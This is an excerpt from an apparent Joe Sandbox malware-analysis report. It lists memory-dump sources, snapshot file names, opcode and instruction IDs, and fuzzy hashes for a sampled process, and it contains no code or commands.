                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5b4c8a7dc7348bd6175f0946388e3b91edb6eca031ba7d96305c5b88c62ca16b
                • Instruction ID: 787286d2f42951b64bf4f9ab6510056baac1dc913bb812b0548a083f822e0dcc
                • Opcode Fuzzy Hash: 5b4c8a7dc7348bd6175f0946388e3b91edb6eca031ba7d96305c5b88c62ca16b
                • Instruction Fuzzy Hash: CE319374A09A5D8FDF84EF5CC889AA97BF1FF69301F0505A9A409DB2A1CB74E841CB00
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4bf812ac5f4c79e39ba11c766508d597bb005598af9f9f3f4f16a980e3998342
                • Instruction ID: 8a35b09b39128e66c7267dbca2e0e50fa2a0485538f70179619248473cd683c0
                • Opcode Fuzzy Hash: 4bf812ac5f4c79e39ba11c766508d597bb005598af9f9f3f4f16a980e3998342
                • Instruction Fuzzy Hash: 6A219B30A04A1DCFCB94EF58C894BA977F1FF69301F4104A9A44EDB2A1CA35A984CB00
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 484566f0c93bf59c8cde1f6823fb1addf653ec976d77f3cb5e2116ad94c8a818
                • Instruction ID: 8d97f6814135ee56a5a93fea1330f66bdce34d012bf4efe020fa4292a946e33b
                • Opcode Fuzzy Hash: 484566f0c93bf59c8cde1f6823fb1addf653ec976d77f3cb5e2116ad94c8a818
                • Instruction Fuzzy Hash: EF216D3091C68E8FE752FF2C98506B9BBA1EF46244F5424B6A48DC22F3D634A8248711
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 83bcd3bb1b92401b2bc216dd30c2ce3eb24b33aee829c5f91bd74d34f6ce9fc6
                • Instruction ID: 7af001a21138559f001265d02e35f0a92b52091fc32cc0889353d895f333320f
                • Opcode Fuzzy Hash: 83bcd3bb1b92401b2bc216dd30c2ce3eb24b33aee829c5f91bd74d34f6ce9fc6
                • Instruction Fuzzy Hash: BD117F74A04A0DCFDB94EF6CD488AA977F1FF69311F1504AAA40DDB266CA30E851CB00
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 89617880288771099216ecc80ac01c4c1ff5cf2c23cd40cedf97593fe9eddc07
                • Instruction ID: 90cf180f883fc2da5ed517990b01bca842fe3a9f44676e325f8e9159fb64617c
                • Opcode Fuzzy Hash: 89617880288771099216ecc80ac01c4c1ff5cf2c23cd40cedf97593fe9eddc07
                • Instruction Fuzzy Hash: 01F0A920C5D68C9FE742EB6498183E8BBE0EF06204F4114EB9048C71F3EA285A94C702
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 14484a432e3efe2c570fb1e7e33bcb7d1b31aed3848a6d6495388d0e1ce7a82f
                • Instruction ID: 1ab0523d125c859c3d29dae83a57aed4b55a8dfec5b018f684485bf382859758
                • Opcode Fuzzy Hash: 14484a432e3efe2c570fb1e7e33bcb7d1b31aed3848a6d6495388d0e1ce7a82f
                • Instruction Fuzzy Hash: 4DE0C22190C2C69AE7036B2C29011F8BF20EF0B288F2520D3D4CE9B4A3D210A9268321
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b6b80c051606cf42c9920cbdf95f07d3f7a2ae1452a2fbb1c6e16e21fd2ac1df
                • Instruction ID: 5d9a03ee16a47f28a5ded2d9f0a23edef5617fc27dfbdd6f82fc0ddd98fa55c3
                • Opcode Fuzzy Hash: b6b80c051606cf42c9920cbdf95f07d3f7a2ae1452a2fbb1c6e16e21fd2ac1df
                • Instruction Fuzzy Hash: EAD09730820A0D4FDB40EF50E4008A6B3A1FB88204F000616FC2CC32A0D339EEB4C781
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 31acc0795103b7ee365235e676bbe2c5100752a8e41f30e9610c9f59b2dc1b78
                • Instruction ID: 76edca869c077e1a67b66a887c9c777d13cb98b6d16c2738d0195f62b6a6c24a
                • Opcode Fuzzy Hash: 31acc0795103b7ee365235e676bbe2c5100752a8e41f30e9610c9f59b2dc1b78
                • Instruction Fuzzy Hash: 57B01233E81019408B00688874010FDF330D782261F403433E61CA3001451151240584
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 215c9c360219f4a77c82430a8e48370273a68631d8e93d57604207168d5d56f9
                • Instruction ID: c35bad6b8802baeefac75f6d76b6706b9bbcd97b3008749da57309f923b6082b
                • Opcode Fuzzy Hash: 215c9c360219f4a77c82430a8e48370273a68631d8e93d57604207168d5d56f9
                • Instruction Fuzzy Hash: 5B217F3080D38A9FEB8ADF6884547B97FB0BF47354F1410AED489E76A2C6399994D701